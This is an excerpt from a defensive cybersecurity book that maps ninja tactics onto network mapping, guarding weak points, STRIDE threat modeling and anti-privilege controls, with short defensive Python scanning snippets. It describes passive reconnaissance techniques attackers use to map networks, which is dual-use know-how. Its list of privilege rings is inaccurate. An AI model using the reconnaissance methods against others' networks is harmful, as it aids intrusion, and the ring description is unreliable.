
CYBERJUTSU

Cybersecurity for the Modern Ninja

by Ben McCarty

San Francisco

CYBERJUTSU. Copyright © 2021 by Ben McCarty.

All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording, or by any information storage or retrieval system, without the prior written permission of the copyright owner and the publisher.

ISBN-13: 978-1-7185-0054-9 (print)
ISBN-13: 978-1-7185-0055-6 (ebook)

Publisher: William Pollock

Executive Editor: Barbara Yien

Production Editor: Rachel Monaghan

Developmental Editors: Nic Albert and Athabasca Witschi

Project Editor: Dapinder Dosanjh

Cover Design: Octopod Studios

Cover Illustrator: Rick Reese

Technical Reviewer: Ari Schloss

Copyeditor: Paula L. Fleming

Interior Design and Composition: Maureen Forys, Happenstance Type-O-Rama

Proofreader: Holly Bauer Forsyth

Indexer: Beth Nauman-Montana

For information on book distributors or translations, please contact No Starch Press, Inc. directly:

No Starch Press, Inc.

245 8th Street, San Francisco, CA 94103

phone: 1-415-863-9900; info@nostarch.com

www.nostarch.com

Library of Congress Cataloging-in-Publication Data

Names: McCarty, Ben, author.
Title: Cyberjutsu : cybersecurity for the modern ninja / Ben McCarty.
Description: San Francisco, CA : No Starch Press, [2021] | Includes bibliographical references and index. | Summary: "Teaches ancient approaches to modern information security issues based on authentic, formerly classified ninja scrolls"-- Provided by publisher.
Identifiers: LCCN 2020052832 (print) | LCCN 2020052833 (ebook) | ISBN 9781718500549 (print) | ISBN 9781718500556 (ebook)
Subjects: LCSH: Computer security. | Computer networks--Security measures. | Computer crimes--Prevention. | Ninjutsu.
Classification: LCC QA76.9.A25 M4249 2021 (print) | LCC QA76.9.A25 (ebook) | DDC 005.8--dc23
LC record available at https://lccn.loc.gov/2020052832
LC ebook record available at https://lccn.loc.gov/2020052833

No Starch Press and the No Starch Press logo are registered trademarks of No Starch Press, Inc. Other product and company names mentioned herein may be the trademarks of their respective owners. Rather than use a trademark symbol with every occurrence of a trademarked name, we are using the names only in an editorial fashion and to the benefit of the trademark owner, with no intention of infringement of the trademark.

The information in this book is distributed on an "As Is" basis, without warranty. While every precaution has been taken in the preparation of this work, neither the author nor No Starch Press, Inc. shall have any liability to any person or entity with respect to any loss or damage caused or alleged to be caused directly or indirectly by the information contained in it.

To my lovely Sarah

and to those helpless organizations

afraid of new ideas

and blind to their own weaknesses

for motivating me to write this book

About the Author

Ben McCarty is an ex-NSA developer and US Army veteran. He is one of the first fully qualified Cyber Warfare Specialists (35Q) to serve in the Army Network Warfare Battalion. During his career, he has worked as a hacker, incident handler, threat hunter, malware analyst, network security engineer, compliance auditor, threat intelligence professional, and capability developer. He holds multiple security patents and certifications. He is currently a quantum security researcher in the Washington, DC, area.

About the Technical Reviewer

Ari Schloss started his cybersecurity career with the federal government at the IRS and has contracted with DHS and CMS (Medicare). He has experience in NIST 800-53/800-171 compliance, cybersecurity defense operations, and forensics. He has a master's degree in Information Assurance and an MBA. He currently serves as a security engineer at a defense contractor in Maryland.

BRIEF CONTENTS

Foreword
Acknowledgments
Introduction
Chapter 1: Mapping Networks
Chapter 2: Guarding with Special Care
Chapter 3: Xenophobic Security
Chapter 4: Identification Challenge
Chapter 5: Double-Sealed Password
Chapter 6: Hours of Infiltration
Chapter 7: Access to Time
Chapter 8: Tools
Chapter 9: Sensors
Chapter 10: Bridges and Ladders
Chapter 11: Locks
Chapter 12: Moon on the Water
Chapter 13: Worm Agent
Chapter 14: Ghost on the Moon
Chapter 15: The Art of the Fireflies
Chapter 16: Live Capture
Chapter 17: Fire Attack
Chapter 18: Covert Communication
Chapter 19: Call Signs
Chapter 20: Light, Noise, and Litter Discipline
Chapter 21: Circumstances of Infiltration
Chapter 22: Zero-Days
Chapter 23: Hiring Shinobi
Chapter 24: Guardhouse Behavior
Chapter 25: Zero-Trust Threat Management

…of the neighboring hosts, traffic flow, services, and protocols used on the network without ever actively interacting with it.

Another method for mapping a network without directly interacting with it is to collect a network admin's emails as they leave the network, to search for network maps of the target in an external file storage-sharing environment, or to look in third-party troubleshooting help forums where the admin may post logs/errors, router configurations, network debugging/tracert/ping output, or other technical details that disclose the layout and configuration of the network. Much like the ninja's uramittsu no jutsu technique, the exploitation of observable information from a target's network can be used to map it without alerting the target. Passive mapping can include measuring the latency of recorded tracerts from the network to identify satellite hops (for example, the presence of a satellite is indicated by a sudden 500-millisecond increase in communication delay) or detecting a firewall system's deep-packet processing (for example, the preprocessor recognizes a potential malicious attack and adds perceptible delays to specially crafted communication). Passive mapping might also include information disclosure of the internal network from external DNS zones and record responses; public procurement orders and purchase requests for certain software/hardware; or even job postings for network/IT admins with experience in a specific technology, networking equipment, or hardware/software.
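The satellite-hop heuristic above is easy to automate. Here is a minimal sketch, assuming Python and a saved plain-text traceroute capture named trace.txt (the filename is hypothetical), that flags hops where the round-trip time jumps by several hundred milliseconds:

    import re

    # Parse per-hop round-trip times (ms) from a saved traceroute capture.
    # Assumes one hop per line with at least one "<number> ms" field.
    hops = []
    with open("trace.txt") as f:
        for line in f:
            times = [float(t) for t in re.findall(r"([\d.]+)\s*ms", line)]
            if times:
                hops.append(min(times))  # best RTT is the least noisy estimate

    # A sudden ~500 ms increase between consecutive hops suggests a
    # satellite link (geostationary round trips add hundreds of ms).
    for i in range(1, len(hops)):
        delta = hops[i] - hops[i - 1]
        if delta > 400:
            print(f"Hop {i + 1}: +{delta:.0f} ms over previous hop -> possible satellite link")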

After the attacker has spent so much time developing them, their maps may be more complete than the target's own—the adversary may know more about the target's network than the target does. To offset any such advantage, network defenders should strive to develop and maintain superior maps and keep them highly protected.

Creating Your Map

The map creation process can happen in three general steps:

1. Make the necessary investment to create a comprehensive, accurate map that can be easily updated and securely stored. It should contain the information necessary for each team's use case (such as IT, the network operations center [NOC], and the security operations center [SOC]). Consider hiring a dedicated person or team, or an outside vendor, to make and analyze the map.
2. Make the map, including the types of precise details specified in the beginning of this chapter.
3. Request that the map be peer reviewed as part of change management requests, as well as whenever anyone notices an incongruity in or divergence from the map.

Let’s take a closer look at the second step: making the map.

After you have identified all key stakeholders and persuaded them that this project should be a priority, the first step is to gather anything and everything your organization has internally that could help with the mapping process. This includes wiring diagrams, old network architecture project plans, vulnerability scans, asset inventory lists, inventory audits of the data center, DHCP leases, DNS records, SNMP network management data, endpoint agent records, packet captures (PCAP), SIEM logs, router configurations, firewall rules, and network scans. Router configurations should be the primary source for constructing the major architecture and layout of your network map; consider starting by putting your core/central router(s) in the middle of your map and branching out from there. PCAP captures can reveal endpoints communicating on the network that may not respond to network scans or that cannot be reached by scans due to network filtering. After you allow select systems to collect PCAP for an extended period in promiscuous mode, it will be possible to review the list of endpoints found in the PCAP, as seen in Figure 1-3.

Figure 1-3: Wireshark screenshot of endpoints discovered during PCAP collection
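If you would rather pull that endpoint list programmatically than read it out of Wireshark, a short script can do it. This is a minimal sketch assuming Python with the third-party scapy package installed and a capture file named capture.pcap (the filename is hypothetical):

    from scapy.all import IP, rdpcap

    # Load a saved packet capture and tally every IP endpoint observed.
    packets = rdpcap("capture.pcap")
    endpoints = {}
    for pkt in packets:
        if IP in pkt:
            for addr in (pkt[IP].src, pkt[IP].dst):
                endpoints[addr] = endpoints.get(addr, 0) + 1

    # Endpoints seen here but absent from scan results may be hosts that
    # ignore probes or sit behind filtering: candidates for the map.
    for addr, count in sorted(endpoints.items(), key=lambda kv: -kv[1]):
        print(f"{addr}\t{count} packets")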


Ideally, PCAP collection should occur during network scans to validate the reach of the scans. Also, multiple network scans should be conducted, with a minimum of one endpoint per subnetwork conducting a scan of its subnet; these scans can be manually stitched together into a network map topology, as shown in Figure 1-4. Identify items that can be automated so this process is easier to repeat in the future.

Figure 1-4: The Zenmap topology view of a scan of the 10.0.0.0/24 subnet
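As a starting point for automating those per-subnet scans, the following sketch uses the third-party python-nmap wrapper; it assumes nmap is installed and that you are authorized to scan the listed subnets, which are hypothetical:

    import nmap  # third-party "python-nmap" wrapper around the nmap binary

    # Subnets you are authorized to scan; replace with your own.
    subnets = ["10.0.0.0/24", "10.0.1.0/24"]

    scanner = nmap.PortScanner()
    discovered = {}
    for subnet in subnets:
        # -sn = ping scan: host discovery without port scanning
        scanner.scan(hosts=subnet, arguments="-sn")
        discovered[subnet] = scanner.all_hosts()

    # Merge results into one view, ready to stitch into the map.
    for subnet, hosts in discovered.items():
        print(f"{subnet}: {len(hosts)} hosts")
        for host in hosts:
            print(f"  {host}")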

Once all the data has been collected, it will need to be processed, analyzed, and merged. It will be useful to find out which source of data is the most accurate, as well as to identify data sources with unique and helpful information (for example, the last-seen time of a device), before consolidating all the data. Also, any incongruities and discrepancies should be investigated. These might include devices missing from the network, rogue devices in the network, and strange network behavior or connections. If you discover that your network scanners were not able to penetrate certain enclaves or subnets due to IP rules or intrusion prevention systems (IPSes), consider requesting network changes to allow deeper and more comprehensive scanning. A key outcome from this stage of the project is the identification and location of all authorized and unauthorized devices connected to your network—a huge accomplishment.

Evaluate software-mapping tools that can automatically ingest SNMP data, network scans, and vulnerability scans and allow manual editing to incorporate any additional data. The tool you choose should produce a comprehensive, accurate, and detailed network map that meets your stakeholders' needs. Pick the best solution that will handle your data and meet your budget.

Produce the map and test it. Test its usefulness during change management meetings/security incidents and network outage/debugging events. Does it help resolve issues and find problems faster? Test its accuracy with traceroutes and tcpdumps over interfaces. To test the accuracy with traceroutes, conduct internal and external traceroutes from different network locations to see whether the hop points (routers) are present in the map and flow logically according to your map. An example traceroute is seen in Figure 1-5.

Figure 1-5: A Windows traceroute to example.com
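A small script can also help with the accuracy check by comparing observed hops against the routers on your map. The sketch below is one possible approach, assuming Python on a Unix-like host with the system traceroute command available; the router list and target are hypothetical:

    import re
    import subprocess

    # Router interface IPs that appear on the network map (hypothetical).
    mapped_routers = {"10.0.0.1", "10.0.1.1", "192.0.2.1"}

    # Run the system traceroute and pull out each hop's IP address.
    output = subprocess.run(
        ["traceroute", "-n", "example.com"],
        capture_output=True, text=True, timeout=120,
    ).stdout

    for line in output.splitlines():
        match = re.search(r"^\s*(\d+)\s+([\d.]+)", line)
        if match:
            hop, addr = match.groups()
            status = "on map" if addr in mapped_routers else "NOT ON MAP"
            print(f"hop {hop}: {addr} ({status})")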

See what your red team and blue team can do with your map. Collect feedback and perform the mapping process again with the goal of producing an even better map in less time.

CASTLE THEORY THOUGHT EXERCISE

Consider the scenario in which you are the ruler of a medieval castle with valuable information, treasure, and people within your stronghold. You receive credible threat intelligence that a ninja has thoroughly mapped your castle and surrounding area, though it is unclear whether this activity was part of active targeting or just passive reconnaissance. You don't know what the map looks like or how detailed it is. Your only map of the castle is an architectural design plan that was used during initial construction—and was designed for the builders and not for other users—but has since become out of date.


What does the ninja’s map likely include that your map doesn’t? What

would the ninja know about your castle that you don’t, and how could that

information be used for infiltration? Who in your fiefdom would benefit from

access to the ninja’s map? Whom would you trust to map your castle in the

same way the ninja did, allowing you to see what the ninja sees?

Recommended Security Controls and Mitigations

Where relevant, each recommendation is presented with an applicable security control from the NIST 800-53 standard, and it should be evaluated with the idea of maps in mind.

1. Assign responsibilities for documenting a network map. Implement policies and procedures to coordinate updates of the map between teams. [CM-1: Configuration Management Policy and Procedures; CM-3: Configuration Change Control | (4) Security Representative; CM-9: Configuration Management Plan]
2. To establish a baseline, document the configuration of the network's topology, architecture, logical placement, and information systems. [CM-2: Baseline Configuration]
3. Incorporate flaw identification (such as map inaccuracies) and remediation (for example, of vulnerabilities inherent in the network architecture) into the network-mapping process. [SI-2: Flaw Remediation]

Debrief

In this chapter, you got a review of shinobi mapping objectives, map standards, and mapping techniques, as well as an overview of modern network-mapping practices and technologies. Considering the importance of network maps, how to create (good) maps, and how attackers collect intelligence on your system may have sparked your imagination, and you may have thought of new data sources or techniques you could use to map your own network and others' networks.

In the next chapter, you will get a chance to use your network map as a type of data flow diagram (DFD) to perform threat modeling. This means you'll identify areas in your network that a threat actor is likely to attack or use to bypass your defenses and infiltrate it. I'll discuss the novel ninja security technique of "guarding," which can be used to defend these weak points in your network.

2
GUARDING WITH SPECIAL CARE

Even castles with strong fortifications should be guarded, paying particular attention to the recessed corners.

What shinobi should keep in mind when stealing into a castle or camp are the naturally fortified and difficult directions, the woods, and blind spots.

—Yoshimori Hyakushu #10

Shinobi were historically proficient infiltrators. The ancient scrolls describe how to quickly identify and brutally exploit weak spots in an enemy's fortifications. The scrolls also stress that shinobi should use higher-order thinking to creatively apply their knowledge when building their own defenses. Bansenshūkai advises commanders tasked with defending a camp or castle to identify, inspect, and guard with special care the areas where shinobi are most likely to attempt entry, such as the recessed corners of a castle's stone walls, rubbish disposal areas, water pipes, and nearby woods or bushes.1


Understanding Attack Vectors

Consider the castle’s wall an attack surface and weak points in the castle’s

wall (for example, the water pipe or poorly placed stones in the wall that

provide footholds) attack vectors. The term attack surface refers to all the

software, networks, and systems that the adversary has the opportunity to

attack. Any point within the attack surface can be an attack vector, or the

means an attacker uses to gain access. In cybersecurity, it’s always advis-

able to reduce your attack surface. That said, while reducing the castle

footprint would shrink the attack surface that needs to be defended, it

wouldn’t mitigate the amount of damage the adversary could inflict or

prevent any given attack vector from being exploited. Nonetheless, attack

surface reduction can make guarding the target easier.

Bansenshūkai’s volume on hidden infiltration includes a list of well-

intentioned defensive techniques, weapons, and modes of thought that

can actually expose a camp to risk. It implores commanders to consider

how everything in their environment could be used against them. For

example, the scroll instructs infiltrators to look for shinobi-gaeshi, spikes

set up around an enemy’s encampment to deter would-be attackers.2

Because defenders placed these spikes in locations they considered

vulnerable, the spikes’ presence told enemy shinobi where the defenses

were inadequate; defenders were essentially broadcasting their insecuri-

ties. Shinobi knew they could remove these spikes—doing so was rela-

tively easy, as they were almost always attached as an afterthought—and

gain passage through the weakest spot in the target’s perimeter.3

A succinct example of such security that is "bolted on" as an afterthought is found in Microsoft Windows' PowerShell. The multitude of security features added on top of the .NET Framework with each new version of PowerShell do not address the product's core flaws and, in fact, have allowed threat actors to create an armory of tools and weapons that can be used to infiltrate systems that support PowerShell. This is an excellent case study for any security researcher wishing to examine shinobi-gaeshi more closely.

The ancient castles still standing in Japan are not typically adorned with spikes, but they do tend to have water pipes that are too small for a human to climb through, perimeters cleared of vegetation, and no recessed corners in the outer walls—all of which suggest that emperors, taking their cues from shinobi, made efforts over time to eliminate these vulnerabilities. However, while it is ideal to eliminate weaknesses so they do not require guarding, it is not always possible.

In this chapter, we’ll discuss the concept of guarding and its pro-

posed place within the five functions of cybersecurity. We will then

Guarding with Special Care 17

discuss how to identify the vulnerable areas that may require guarding

with threat modeling.

The Concept of Guarding

Guarding is the act of exercising protective control over assets by observing the environment, detecting threats, and taking preventative action. For example, the lord of a castle identifies a fairly large water drainage pipe in the castle wall as a weak point. The lord retains the pipe, which performs an important function in allowing water to exit, but requires a guard to stand nearby, preventing attackers from using the pipe as a means of access.

In general, organizations tend to keep cybersecurity staff in the dark about weak systems, network blind spots, or vulnerable attack vectors that should be guarded with special care. Some organizations assume it's entirely the cybersecurity staff's responsibility to discover security flaws in the network. Many stakeholders have not identified these attack vectors in the first place, or if no commercial solution exists or no commonly accepted countermeasure can be applied easily, they simply ignore the weaknesses and hope they will not be exploited.

In some instances, management directs security personnel not to perform basic logging, scanning, or patching of legacy systems for fear that touching them will disrupt business operations. In more political organizations, it's common for a threat to not be recognized as a valid concern unless it's identified through a formal documentation process. Imagine seeing that a castle is missing its west wall, reporting this obvious vulnerability to the king, and having the king dismiss your concerns because his guards have not mentioned it in their official reports.

Guarding Within a Cybersecurity Framework

The National Institute of Standards and Technology (NIST) Cybersecurity Framework4 seeks to prevent these common missteps and improve organizations' resilience to cyber threats through five core cybersecurity functions: identify, protect, detect, respond, and recover. These functions help identify vulnerabilities in networks and systems by using common information security tools and processes.

For instance, most organizations begin the process of identifying weaknesses by conducting vulnerability or application scans of systems on their network—this is the identify function. Effective and reliable, these scans identify obvious security issues such as unpatched software, active accounts with blank passwords, default factory credentials, unparameterized input, and SSH ports open to the internet. Next comes the protect function. Upon discovery of an unsecured system, the scanner documents the problem, and then security staff fixes or mitigates the vulnerability with patches; configuration changes; or long-term architectural, security system, or software implementations.

If the security staff is unable to protect a system that has been identified as an attack vector, I believe they should guard it through human controls. However, a guard function is missing from the NIST framework. Instead, we move straight to the detect function: the security staff attempts to detect an adversary by monitoring and investigating anomalous events. Once the security staff detects infiltration, only then do they execute the respond function by containing the threat, neutralizing the threat, and reporting it.

Last is the recover function: restoring the systems and data to operational status, as well as improving their ability to resist future attacks.

While essential to a robust security profile, these safeguards are prevention-, protection-, or response-based functions. The cybersecurity industry rarely applies the concept of guarding—using human controls and protection—to information systems, because it's not feasible for a human defender to manually inspect and approve every email, web page, file, or packet that leaves or enters the environment in the way that a gate guard could watch people or packages entering a building.

For example, computers with 1Gbps network connections can process more than 100,000 packets per second, far more than any human could inspect. Instead of using human guards, defenders either rely heavily on automated security controls or simply accept/ignore risk as part of doing business. Guarding can still be feasible within a modern digital network, however, if guards are inserted only into areas that need special care and attention, such as the most likely attack vectors. This is why threat modeling to identify these areas in your organization will be useful.

Threat Modeling

The closest thing to guarding in cybersecurity is threat hunting, which involves vigorously seeking out indicators of infiltration in logs, forensic data, and other observable evidence. Few organizations perform threat hunting, and even in those that do, a hunter's job is to detect, not guard.

Nonetheless, it's important that cyber defenders go beyond the conventional framework, continually imagining new ways in which networks and information systems could be attacked, and implement the necessary defenses. To this end, defenders can use threat modeling to implement information flow controls and design safeguards against threats rather than simply react to them.


Typically performed only by cyber-mature organizations, threat modeling involves documenting a data flow diagram (DFD), which describes the flow of data and processes inside systems. DFDs are typically documented as a type of flowchart but can be roughly represented by a detailed network map. A DFD can be used as a tool for structured analysis of your attack surface that allows you to think of attack scenarios within the parameters of the documented information systems. It doesn't require vulnerability scanning, proving of the attack scenario by red teams, or validation from a compliance framework, and organizations don't need to wait for a security incident to prove a threat model before acting to guard against the vulnerability.

Understanding the modern cyber equivalents to the "recessed corners of a castle's stone walls, rubbish disposal areas, water pipes, and nearby woods or bushes" of your environment could help you identify attack vectors that may need guarding with special care.

Consider this example: as part of their nightly duties, a security guard pulls on every doorknob in an office to make sure the doors are locked. If they find an unlocked door, they lock it, secure the keys, and file a security incident ticket.

It is later determined that a security incident occurred because door keys were copied or stolen, so the organization adds a second-level authenticator control (such as a keypad or badge reader) to the doors, changes the locks, and issues new keys. These new preventive security controls satisfy compliance auditors, and the ticket reporting the unsecured doors is closed. The chief information security officer (CISO) even hires a red team to perform a narrow-scope physical penetration test of the new door-locking mechanisms, and the team confirms that they were denied access because of the enhanced security measures.

However, once we conduct threat-modeling exercises, we identify that it's possible to push moveable ceiling tiles out of the way and climb over the office wall, bypassing the new security measures altogether. To counteract this, we could add controls, such as security cameras or motion detectors in the ceiling crawl space, or we could install solid, tunnel-resistant ceilings and floors. Guards could even be hired and trained to look for evidence of disturbed ceiling tiles, ceiling particulate on the floor, or footprints on the walls. Guarding against this threat would require that guards be posted inside the room or stationed within the ceiling crawl space, armed with the authority and tools to protect the room from intruders.

The feasibility of implementing such countermeasures is low—you might be laughed out of your manager's office for even suggesting them. It's easy to see why organizations are more likely to accept or ignore certain threats than attempt to repel them, and this is likely why the NIST Cybersecurity Framework doesn't include a guard function. If thoughtfully informed by detailed threat modeling and carefully implemented in a creative and deliberate manner, however, this guard-centric mode of thinking can bolster the security of information systems and networks.

An example of a scenario suitable for the implementation of the guard function is in jump boxes. Jump boxes are systems that span two or more network boundaries, allowing administrators to log in remotely to the jump box from one network and "jump" to another network to gain access to it. The conventional cybersecurity framework advises hardening jump box systems by patching all known vulnerabilities, restricting access with various firewall rules, and monitoring audit logs for anomalous events such as unauthorized access. However, such technical controls are often attacked or bypassed. A guard, on the other hand, could physically disconnect the internal network cable from the other network and connect it directly only after verifying with the administrator that they have approval to execute remote commands against these systems. The guard could also actively monitor actions on the machine in real time and forcibly terminate the session anytime they observe malicious or unauthorized actions. Implementing the guard function in this way might mean hiring a human guard to sit in the data center to protect both physical and remote access to these sensitive systems.

Using Threat Modeling to Find Potential Attack Vectors

The basic steps for identifying attack vectors are to follow the guidelines for threat modeling, starting with creating a DFD. Once potential attack vectors are identified from the DFD, the shinobi scrolls recommend inspecting them to determine what technical security controls can be implemented to protect them. Then, as a last resort, use guards to defend these areas as well. You can use the network map you made in the previous chapter to help create the DFD or use it as a rough substitute.

1. Model your information systems. Create an accurate DFD with the help of your organization's network, security, development, business, and other IT system owners and experts. It does not need to use Unified Modeling Language (UML) or other advanced concepts—it simply needs to accurately represent your systems and the information within them. Note that large, complex systems can easily take a team more than six months to diagram.

2. STRIDE and guard. STRIDE is a threat-modeling methodology developed by Microsoft5 to describe what could go wrong in an information system. The acronym comes from the ways in which an attacker could violate six properties of the system:

Spoofing Identity = Authentication
Tampering with Data = Integrity
Repudiation/Deniability = Nonrepudiation
Information Disclosure = Confidentiality
Denial of Service = Availability
Elevation of Privilege = Authorization

To use STRIDE, you will review your DFD and, at every point where there is data input, data processing, data output, or other data flows/rules, hypothesize how an adversary may threaten it. For example, if a system requires a thumbprint to verify a user's identity before allowing access to the system, you might consider how they could spoof the thumbprint to impersonate a different user. Similarly, you could think about ways they could tamper with the fingerprint database to insert their print, or you could explore a scenario in which the attacker causes the fingerprint scanner to go down, allowing unauthorized access through a weaker authentication process. (A minimal code sketch of this kind of STRIDE walk-through appears after this list.)

After learning this framework, you can use it to challenge any imagined threat models that do not accurately represent your systems or scenarios that do not describe how a plausible threat impacts a specific component, surface, or vector. This may require inviting technical subject matter experts to threat-modeling sessions.

Suppose, for example, that an organizational threat-modeling session produces the following scenario: "The threat of malware compromises the integrity of internal databases."

This threat is not properly modeled. Among other pieces of critical information, the scenario does not describe how malware could be delivered and installed. Nor does it describe how the malware would compromise the integrity of the database: does it encrypt, delete, or corrupt data? It does not describe which vectors allow the threat to impact the system, and it doesn't consider the information flow and controls currently in place or provide realistic countermeasures. If, for example, we determined that the most plausible way to infect an internal business database with malware would be through a malicious USB drive, then security may need to draft policies detailing how staff must use USB drives or install cameras to monitor access to USB ports. The organization might decide to grant security the ability to turn USBs on or off, dictate which drives can interface with USBs, control the information flow and direction of USB ports, inspect the files on USB drives before granting access to the requestor, control access with hardware or software locks, or even hot-glue the USB ports shut. Such measures, resulting from thorough threat modeling, allow security personnel to guard against specific threats with special care, rather than having to accept the risk or being limited to protect and detect functions.

3. Do not advertise bolted-on security. Threat modeling is an iterative, infinite process of evaluating new threats and developing protective countermeasures. In your haste to protect your systems, avoid the use of shinobi-gaeshi security controls—defensive efforts that may backfire by drawing attention to your vulnerable areas. Often because of time, resource, or operational restrictions, you may have taken only half measures that a motivated, sophisticated threat actor can defeat. For example, hot glue in a USB port can be removed with isopropyl alcohol. Where possible, assess the viability of a pure security-first defense approach.

In the USB threat example, the USB interacts with the hardware abstraction layer (HAL) that sits below the OS kernel. It cannot be fully protected or mitigated with software and policy controls, as those exist above the kernel and can be bypassed. Therefore, a more complete solution might be to implement a motherboard and chassis configuration in which USB ports do not even exist. In contrast, hot glue in the USB port advertises to motivated threat actors that you have not properly addressed the security of USBs, and it will likely be a successful attack vector for them should they be able to pull it free—just as the shinobi pulled out the spikes bolted onto pipes and walls in ancient times.
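As referenced in step 2, here is one hypothetical way a STRIDE walk-through of a DFD element might be recorded in code. This is a minimal Python sketch, not a prescribed tool:

    from dataclasses import dataclass, field

    STRIDE = {
        "Spoofing": "Authentication",
        "Tampering": "Integrity",
        "Repudiation": "Nonrepudiation",
        "Information Disclosure": "Confidentiality",
        "Denial of Service": "Availability",
        "Elevation of Privilege": "Authorization",
    }

    @dataclass
    class DFDElement:
        """A data input, process, output, or flow from the DFD."""
        name: str
        threats: dict = field(default_factory=dict)

        def consider(self, category: str, scenario: str):
            # Record a hypothesized threat under one STRIDE category.
            assert category in STRIDE, f"unknown STRIDE category: {category}"
            self.threats.setdefault(category, []).append(scenario)

    # Example: the fingerprint-scanner scenarios described above.
    scanner = DFDElement("thumbprint scanner")
    scanner.consider("Spoofing", "forge a thumbprint to impersonate a user")
    scanner.consider("Tampering", "insert an attacker print into the database")
    scanner.consider("Denial of Service", "take the scanner down to force weaker auth")

    for category, scenarios in scanner.threats.items():
        print(f"{category} (violates {STRIDE[category]}):")
        for s in scenarios:
            print(f"  - {s}")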


CASTLE THEORY THOUGHT EXERCISE

Consider the scenario in which you are the ruler of a medieval castle with valuable assets within your stronghold. You receive credible threat intelligence that a ninja plans to infiltrate your castle and set fire to the food supply in your dungeon. The dungeon has multiple ingress/egress points whereby staff transport food, moving freely and without monitoring.

Consider what measures guards could take to protect food from a fire in the basement. What staffing changes could you implement to control human interactions with the food and protect it from harm? What measures would ensure that guards could quickly observe, report, and respond to fire in the basement? How could guards detect a ninja infiltrating the basement, and what architectural changes could be made to mitigate blind spots that allow access to the food?

Note that while it would be advisable to have backup food supplies in alternate locations or to store the food within fire-resistant material, for this exercise, consider how guards could control and protect the food rather than directly address the fire threat.

Recommended Security Controls and Mitigations

Where relevant, each recommendation is presented with an applicable security control from the NIST 800-53 standard, and it should be evaluated through the lens of guarding with special care.

1. Review the results of auditors, red team assessments, vulnerability scans, and incident reports to find vulnerabilities in your environment that cannot be easily patched or mitigated with controls (that is, those that require special guarding). [CA-2: Security Assessments; CA-8: Penetration Testing; IR-6: Incident Reporting | (2) Vulnerabilities Related to Incidents; RA-5: Vulnerability Scanning]
2. Perform threat modeling of your environment to identify vulnerabilities. Then determine which ones can be designed out of your environment. Explore the concept of guarding security functions and apply those controls to threats that cannot be easily purged. [SA-8: Security Engineering Principles; SA-14: Criticality Analysis; SA-15: Development Process, Standards, and Tools | (4) Threat Modeling/Vulnerability Analysis; SA-17: Developer Security Architecture and Design]
3. To deter, protect against, and ensure rapid response to threats, hire real-time security personnel as guards and integrate them into vulnerable areas of business operations. [IR-10: Integrated Information Security Analysis Team]

Debrief

This chapter has helped you think about the places in a network environment that an adversary is likely to target for infiltration. You have also been introduced to the concept of guarding with direct human interaction between information systems and processes. You may have utilized your network map from the previous chapter or created your own data flow diagram (DFD) as a representation of your environment to identify likely attack vectors and potential STRIDE threats that could be mitigated with guards.

In the next chapter, we’ll explore a “xenophobic” security concept

used by the ancient ninja that may hinder adversaries from finding any

common ground or footholds in your environment to even start their

attack vector process.

3
XENOPHOBIC SECURITY

If you accept strangers without much thought, the enemy shinobi may come in disguised as a stranger and seek information from the inside.

If beggars or outcasts come near the guardhouse, treat them in a rough way and clear them off.

—Yoshimori Hyakushu #91

In this chapter, we’ll explore the concept

,

of xenophobic

security—or security based on a distrust of outsiders—and

how it can be applied as a type of anti-privilege protection

domain. To illustrate this idea, we’ll consider the hostile

environment that shinobi had to navigate.

Shinobi trying to infiltrate villages and gather information in plain sight faced a ubiquitous challenge: the pervasive xenophobia of the medieval Japanese. The isolation of the country's villages gave rise to unique dialects, hairstyles, clothing, and other customs that made each community its own social ecosystem.1 The small populations in these remote locales meant everyone usually knew everyone else, and an outsider obviously did not fit in.2

As outsiders, the shinobi were routinely viewed with suspicion and followed. They could not move freely around town, and they were often prevented from renting rooms and purchasing food. Certainly, villagers would not share information with them. The community's xenophobia reduced the shinobi to anti-privileged status.

Understanding Anti-Privilege

To grasp the significance of anti-privilege, let's first examine the concept of privilege, which in cybersecurity refers to the permissions a user has to perform actions, such as reading or deleting a file. Modern computer systems have a ringed architecture with different levels of privilege:

ring4  Default (unprivileged)
ring3  Normal user (least privileged)
ring2  Superuser (admin)
ring1  Root (elevated privilege)
ring0  Kernel (system)

For example, a common villager (least privileged) or a cat (unprivileged) may be able to leave the town any time they want. A village chief with elevated privilege has the additional permission to lock the town gates at will. However, a foreigner suspected of mischief (anti-privilege) could have less permission than a stray cat (unprivileged) and therefore would not be allowed to leave the village.

This distinction between anti-privileged and unprivileged status is important. In some computer systems, actions such as logging out are considered unprivileged and are given by default to actors in all rings. Untrustworthy processes/users can use these default unprivileged capabilities to enable more malicious actions or operate somewhat freely to further more sophisticated goals. On the other hand, by denying an anti-privileged process the ability to log out, you may prevent it from clearing its session history or evidence of its existence in the first place. Consider if computer systems could adopt a ring5 (anti-privilege) security control. Using our village as an example, one could speculatively force a suspected shinobi to submit to searches and interrogation before being allowed to leave the village. In this way, the village could catch thieves and spies. Furthermore, by making infiltrators' jobs that much more risky and expensive, villages undoubtedly deterred hostile activity.
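As a thought experiment, here is a minimal Python sketch of what a speculative ring5 (anti-privilege) check might look like, where even default actions such as logging out are denied to distrusted actors; all names are hypothetical:

    from enum import IntEnum

    class Ring(IntEnum):
        KERNEL = 0     # system
        ROOT = 1       # elevated privilege
        SUPERUSER = 2  # admin
        USER = 3       # least privileged
        DEFAULT = 4    # unprivileged
        ANTI = 5       # anti-privileged: distrusted outsider

    # Actions normally granted by default to every ring...
    DEFAULT_ACTIONS = {"logout", "list_own_session"}

    def is_allowed(ring: Ring, action: str) -> bool:
        # ...except an anti-privileged actor, which is denied even
        # defaults, so it cannot erase evidence of its own session.
        if ring == Ring.ANTI:
            return False
        return action in DEFAULT_ACTIONS or ring <= Ring.USER

    print(is_allowed(Ring.DEFAULT, "logout"))  # True: unprivileged keeps defaults
    print(is_allowed(Ring.ANTI, "logout"))     # False: anti-privileged is denied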

To infiltrate such a xenophobic village, a shinobi first had to memorize and practice a range of culturally distinct disguises, becoming fluent in the style of dress, dialect, grooming techniques, monetary customs, and social mores unique to the location.


When the cultural disguise was mastered, the shinobi still needed to have a convincing reason to be in the village; usually this was job related. The Ninpiden describes how shinobi could appropriate a generic cover story, perhaps claiming to be a monk on a spiritual journey, a merchant, a beggar, or even a samurai traveling on orders from his lord. (Though also recognized by villagers as an outsider, a samurai did not incur the same level of distrust as a potential fugitive or bandit.)

